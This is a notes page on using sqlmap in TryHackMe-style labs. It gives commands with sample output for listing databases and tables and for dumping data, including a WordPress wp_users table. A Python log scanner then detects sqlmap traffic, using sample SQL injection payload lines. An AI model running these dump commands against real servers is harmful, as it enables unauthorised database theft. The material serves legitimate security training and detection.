sqlmap: Notes

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

apt install sqlmap
sqlmap -u http://10.10.239.79 --forms --dump

Use sqlmap with Burp Suite

sqlmap -r filename-saved-from-burpsuite
sqlmap -r sqlinjection2 --tamper=space2comment --dbms=sqlite --dump --level 5

Example: Dump SQLite

# sqlmap -r sqli-day5 --level 2 --batch --dbms=SQlite --dump 

List all databases

# sqlmap -u http://10.10.200.148/users/login.php --forms --batch --dbms=mysql --dbs
...
[19:05:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:05:23] [INFO] fetching database names
[19:05:24] [INFO] retrieved: 'information_schema'
[19:05:24] [INFO] retrieved: 'wackopicko'
available databases [2]:
[*] information_schema
[*] wackopicko
...

List tables in a database

sqlmap -u http://10.10.200.148/users/login.php --forms --batch --dbms=mysql -D wackopicko --tables
...
[19:09:12] [INFO] testing MySQL
[19:09:12] [INFO] confirming MySQL
[19:09:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0
[19:09:13] [INFO] fetching tables for database: 'wackopicko'
[19:09:13] [INFO] retrieved: 'admin'
[19:09:14] [INFO] retrieved: 'admin_session'
[19:09:14] [INFO] retrieved: 'cart'
[19:09:14] [INFO] retrieved: 'cart_coupons'
[19:09:14] [INFO] retrieved: 'cart_items'
[19:09:15] [INFO] retrieved: 'comments'
[19:09:15] [INFO] retrieved: 'comments_preview'
[19:09:15] [INFO] retrieved: 'conflict_pictures'
[19:09:15] [INFO] retrieved: 'coupons'
[19:09:15] [INFO] retrieved: 'guestbook'
[19:09:16] [INFO] retrieved: 'own'
[19:09:16] [INFO] retrieved: 'pictures'
[19:09:16] [INFO] retrieved: 'users'
Database: wackopicko
...

Example: Dump data from the wp_users table of the wordpress database

sqlmap -u http://wekor.thm/it-next/it_cart.php --forms --dbms=mysql -D wordpress -T wp_users --dump --batch
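
What the runs above look like from the server side, as an added example that is not part of the original notes: a small Python scan of web access logs for sqlmap's default User-Agent, the /**/ spacing that --tamper=space2comment produces, and schema enumeration in the request target. The log lines are constructed samples and the rule names are hypothetical; POST bodies (the --forms case) are not in access logs, so only the User-Agent rule can fire for them.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" format (not from the original page).
SAMPLE_LOG = """\
10.9.0.5 - - [05/Dec/2020:19:05:22 +0000] "POST /users/login.php HTTP/1.1" 200 512 "-" "sqlmap/1.4.11#stable (http://sqlmap.org)"
10.9.0.5 - - [05/Dec/2020:19:05:23 +0000] "GET /item.php?id=1%27/**/UNION/**/ALL/**/SELECT/**/NULL--%20- HTTP/1.1" 200 733 "-" "Mozilla/5.0"
10.9.0.6 - - [05/Dec/2020:19:05:40 +0000] "GET /item.php?id=1%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables)%3E0 HTTP/1.1" 200 733 "-" "Mozilla/5.0"
10.9.0.7 - - [05/Dec/2020:19:06:01 +0000] "GET /item.php?id=42 HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Hypothetical rule names. Each rule inspects the User-Agent or the URL-decoded request target.
RULES = {
    "sqlmap-user-agent": ("ua", re.compile(r"^sqlmap/", re.I)),
    "comment-as-space": ("url", re.compile(r"\b(select|union|all|and|or|from|where)/\*\*/", re.I)),
    "schema-enumeration": ("url", re.compile(r"\b(information_schema|sqlite_master)\b", re.I)),
}

def scan(log_text):
    """Return {client_ip: sorted rule names} for every client that matched a rule."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        fields = {"ua": m["ua"], "url": unquote_plus(m["url"])}
        for name, (field, pattern) in RULES.items():
            if pattern.search(fields[field]):
                hits[m["ip"]].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```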

Reference

>>> sqlmap cheat sheet

>>> THM | 25 Days of Cyber Security - Day 5

Practice

>>> https://tryhackme.com/room/ccpentesting

>>> The Cod Caper | Task 4 - Web Exploitation

>>> THM Advent of Cyber 2 | Task 10 - Day 5

>>> THM | SQL Injection Lab

>>> THM | 25 Days of Cyber Security - Day 5

>>> THM | Wekor

>>> THM | WebAppSec 101
